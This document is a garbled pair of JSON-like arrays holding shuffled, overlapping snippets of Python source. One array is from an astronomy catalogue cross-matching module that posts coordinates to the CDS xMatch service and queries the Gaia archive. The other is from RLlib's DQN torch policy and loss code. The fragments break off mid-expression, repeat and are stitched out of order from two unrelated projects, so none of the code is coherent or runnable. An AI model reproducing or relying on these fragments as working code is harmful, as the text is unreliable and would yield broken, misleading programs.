Gaia.launch_job_async( \"\"\"select g.*,", "does not exist in both catalog\" % col_field) uniques =", "degree in cat (assumed to be ICRS; includes cos(Dec)) [only", "using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma= cds_load(resultfilename) except ValueError: #", "ascension in degree in cat2 (assumed to be ICRS) colDec2=", "DR2 and want *all* columns returned; this runs a query", "in cat1 with the declination in degree in cat1 (assumed", "for matching result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' %", "proper motion in right ascension in degree in cat2 (assumed", "d2d array s.t. \"<\" operation can complete else: if swap:", "returned; this runs a query at the Gaia Archive, which", "cat2 (assumed to be ICRS; includes cos(Dec)) [only used when", "resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for line in resultfile2:", "out which of the hierarchy we are running runs= ''.join([str(int(r)-1)", "swap= (False) if False, find closest matches in cat2 for", "in cat2 (assumed to be ICRS; includes cos(Dec)) [only used", "everything is fp64 except 'source_id' being int64 dtype_list = [('{}'.format(i),", "_cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} /", "continue if swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 =", "OUTPUT: (index into cat1 of matching objects, index into cat2", "(assumed to be ICRS) [only used when epochs are different]", "are small enough to not fail\"\"\" # Figure out which", "def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS for matching result= open(resultfilename,'w')", "WIN32= platform.system() == 'Windows' import numpy import astropy.coordinates as acoords", "of objects with open(posfilename,'r') as posfile: num_lines= sum(1 for line", "objects) HISTORY: 2016-09-12 - Written - Bovy (UofT) 2016-09-21 -", "declination in degree in cat1 (assumed to be ICRS) epoch1=", "coords, # not matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree,", "the declination in degree in cat2 (assumed to be ICRS)", "ICRS) [only used when epochs are different] swap= (False) if", "epoch= (2000.) epoch of the coordinates in cat colpmRA= ('pmra')", "of matching objects, angular separation between matching objects) HISTORY: 2016-09-12", "import os import os.path import platform import shutil import subprocess", ".format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch", "temp_d2d else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1))", "\"\"\" if epoch is None: if 'ref_epoch' in cat.dtype.fields: epoch=", "idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d", "sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch batch", "both catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch", "coordinates in cat1 colRA2= ('RA') name of the tag in", "== unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0] ==", "temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique]", "% col_field) uniques = numpy.unique(cat1[col_field]) if swap: # times neg", "== unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d d2d", "time-out, so we recursively split until the batches are small", "line[0] == 'a': continue resultfile.write(line) # Remove intermediate files os.remove(posfilename1)", "with open(posfilename1,'w') as posfile1: with open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with", "cat with the proper motion in declination in degree in", "mindx= d2d < 1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False", "uniques: # loop over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] ==", "unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx=", "of time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2=", "CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface INPUT: cat", "idx_2.shape[0] == 0: # the case where a class only", "!= 2000.] colpmDec= ('pmdec') name of the tag in cat", "d2d * temp_d2d.unit # make sure finally we have an", "= mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to make sure filtering out", "nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails for large matches, because of", "(assumed to be ICRS; includes cos(Dec)) [only used when epochs", "job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve all gaia columns, returning", "to v. small diff., because match is against *original* coords,", "m on m.source_id = g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma=", "if col_field is not None: try: # check if the", "'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum distance in arcsec colRA=", "idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields: if", "0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree,", "idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1=", "match, requires 'RA' and 'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3')", "= xcat.split('/')[-1] if table_identifier == 'gaia2': table_identifier = 'gaiadr2' try:", "idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d", "line in posfile) # Write the header line with open(posfilename1,'w')", "('pmra') name of the tag in cat2 with the proper", "when epochs are different] colpmDec2= ('pmdec') name of the tag", "for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1)", "catalog xcat - matched catalog returned by xmatch.cds colRA= ('RA')", "(UofT) 2016-09-21 - Account for Gaia epoch 2015 - Bovy", "in arcsec colRA= ('RA') name of the tag in cat", "only read the first row max to reduce workload to", "'-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result)", "upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve all", "ValueError: # Assume this is the time-out failure pass else:", "Second catalog maxdist= (2) maximum distance in arcsec colRA1= ('RA')", "string, then cross-match on RA and Dec with additional matching", "to be ICRS) epoch2= (2000.) epoch of the coordinates in", "num_lines= sum(1 for line in posfile) # Write the header", "squeezing precision from int64 on source_id as source_id is always", "idx_1.shape[0] == 0 or idx_2.shape[0] == 0: # the case", "def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE: Match a matched", "not matched coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2=", "until the batches are small enough to not fail\"\"\" #", "then convert source_id to int64 will keep its precision data", "with open(posfilename,'r') as posfile: with open(posfilename1,'a') as posfile1: with open(posfilename2,'a')", "with the XML output of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'),", "xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE:", "with open(resultfilename,'w') as resultfile: with open(resultfilename1,'r') as resultfile1: for line", "mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field]", "- Added gaia_all_columns - Bovy (UofT) \"\"\" if epoch is", "cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import Gaia # Write another", "maxdist= (2) maximum distance in arcsec colRA= ('RA') name of", "shift objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0.", "colDec1= ('DEC') name of the tag in cat1 with the", "mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to make sure filtering out all", "(assumed to be ICRS) epoch1= (2000.) epoch of the coordinates", "numpy.any(depoch != 0.): # Use proper motion to get both", "all neg ones which are untouched mindx= ((d2d < maxdist*u.arcsec)", "(2000.) epoch of the coordinates in cat colpmRA= ('pmra') name", "wr.writerow(['RA','DEC']) for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat)", "else: epoch1= 2000. if epoch2 is None: if 'ref_epoch' in", "if selection == 'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently" ]
[ "ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import", "add LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm)", "support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) =", "if config[\"hiddens\"]: # try to infer the last layer size,", "optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip grads", "from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import", "floor_equal_ceil) mu_delta = q_probs_tp1_best * (b - lb) ml_delta =", "= torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best = torch.sum(", "- 1)) lb = torch.floor(b) ub = torch.ceil(b) # Indispensable", "type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals", "TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda:", "for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0", "0) r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau -", "= action_space.n # TODO(sven): Move option to add LayerNorm after", "import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy", "policy.q_values = q_vals return policy.q_values, TorchCategorical, [] # state-out def", "policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model, _,", "\"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel,", "torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean,", "+ advantages_centered else: value = action_scores return value, logits, probs_or_logits", "= try_import_torch() F = None if nn: F = nn.functional", "False, **kwargs) -> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model,", "(action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits,", "< 0.5).float() # (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms)", "# generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model =", "q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0):", "to `prioritized_replay_alpha` self.td_error = softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error", "name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven):", "1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau,", "Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training)", "torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau =", "obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if", "action_space.n # TODO(sven): Move option to add LayerNorm after each", "(ub - b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b", "for # priority is robust and insensitive to `prioritized_replay_alpha` self.td_error", "were selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n)", "TensorType, explore, is_training: bool = False): config = policy.config model_out,", "**policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None:", "dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask)", "config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def", "logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if", "done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max)", "q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net =", "def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS:", "= F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 >", "import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule", "Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model", "config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\":", "build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) -> TensorType: config =", "# compute RHS of bellman equation q_t_selected_target = rewards +", "act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS]", "Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from", "TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space:", "num_atoms - 1, dtype=torch.float32) z = v_min + z *", "F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms)", "Policy, model: ModelV2, obs_batch: TensorType, *, explore: bool = True,", "List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping", "else: q_tp1_best_masked = (1.0 - done_mask) * q_tp1_best # compute", "if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is", "policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered =", "(ub - lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project", "{ \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), }", "1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else:", "# Indispensable judgement which is missed in most implementations #", "config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict)", "Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin", "= torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 -", "num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs", "from ray.rllib.agents.dqn.dqn_torch_model import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog", "configured. return apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches,", "q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats", "device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection,", "return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space,", "model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"],", "compute_q_values(policy, model, obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals,", "advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score", "gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete):", "torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\":", "= torch.clamp(r_tau, v_min, v_max) b = (r_tau - v_min) /", "m = ml_delta + mu_delta # Rainbow paper claims that", "obs_batch, explore, is_training) q_vals = q_vals[0] if isinstance(q_vals, tuple) else", "importance_weights, rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms", "logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats = {", "F = None if nn: F = nn.functional class QLoss:", "input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t", "model, action_dist) -> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy =", "nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits =", "- torch.unsqueeze( advantages_mean, 1) value = state_score + advantages_centered else:", "= ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\")", "/ float(num_atoms - 1)) lb = torch.floor(b) ub = torch.ceil(b)", "ub, so pr_j(s', a*) will # be discarded because (ub-b)", "ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE,", "in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected =", "add LayerNorm after each Dense # generically into ModelCatalog. add_layer_norm", "-1), 1) # compute estimate of best possible value starting", "policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType,", "missed in most implementations # when b happens to be", "* torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best,", "config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) #", "value = torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits", "input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass", "torch.ceil(b) # Indispensable judgement which is missed in most implementations", "importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected),", "q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)", "q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1", "gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0)", "( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score,", "input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on loss to", "train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1", "q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"])", "an entropy loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32)", "policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE,", "ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class(", "n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional", "torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project", "ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import", "* q_tp1_best_masked # compute the error (potentially clipped) self.td_error =", "num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"],", "rew_t, obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] =", "after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None:", "import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical,", "to add LayerNorm after each Dense # generically into ModelCatalog.", "= ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs =", "q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1) q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net, policy.action_space.n) q_tp1_best =", "estimate of best possible value starting from state at t", "# Move target net to device (this is done autoatically", "import DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog", "torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected", "{\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin, LearningRateSchedule, ])", "= F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project = F.one_hot(ub.long(),", "ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy", "config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict)", "self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space,", "loss z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z =", "using this cross entropy loss for # priority is robust", "self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] =", "q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = {", "import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from", "to update td error attribute build_q_losses(self, self.model, None, input_dict) return", "# Target Q-network evaluation. q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values( policy,", "F = nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best,", "Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"])", "- b + floor_equal_ceil) mu_delta = q_probs_tp1_best * (b -", "torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1,", "nn = try_import_torch() F = None if nn: F =", "else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score =", "- done_mask) * q_tp1_best # compute RHS of bellman equation", "Q scores for actions which we know were selected in", "each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.target_q_func_vars = policy.target_q_model.variables()", "implementations # when b happens to be an integer, lb", "compute RHS of bellman equation q_t_selected_target = rewards + gamma**n_step", "= action_scores - torch.unsqueeze( advantages_mean, 1) value = state_score +", "(r_tau - v_min) / ((v_max - v_min) / float(num_atoms -", "return self.q_loss.td_error self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space:", "dim=1) m = ml_delta + mu_delta # Rainbow paper claims", "obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def", "support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action", "q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) *", "after each Dense # generically into ModelCatalog. add_layer_norm = (", "isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return policy.q_values, TorchCategorical,", "1) q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) #", "ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights):", "action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space,", "the error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss", "num_atoms > 1: # Distributional Q-learning which corresponds to an", "= torch.mean( importance_weights.float() * huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected),", "policy.action_space.n) q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device))", "Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS],", "if config[\"num_atoms\"] > 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) =", "q_logits_t_selected = torch.sum( q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1) # compute", "nn.functional class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights,", "= nn.functional.softmax( support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits", "> FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best =", "/ ((v_max - v_min) / float(num_atoms - 1)) lb =", "done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t input_dict[SampleBatch.REWARDS]", "import LearningRateSchedule from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException", "device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection,", "torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self):", "True else: num_outputs = action_space.n # TODO(sven): Move option to", "value = state_score + advantages_centered else: value = action_scores return", "= torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss(", "* torch.unsqueeze( 1.0 - done_mask, -1) * torch.unsqueeze(z, 0) r_tau", "typing import Dict, List, Tuple import gym import ray from", "+ 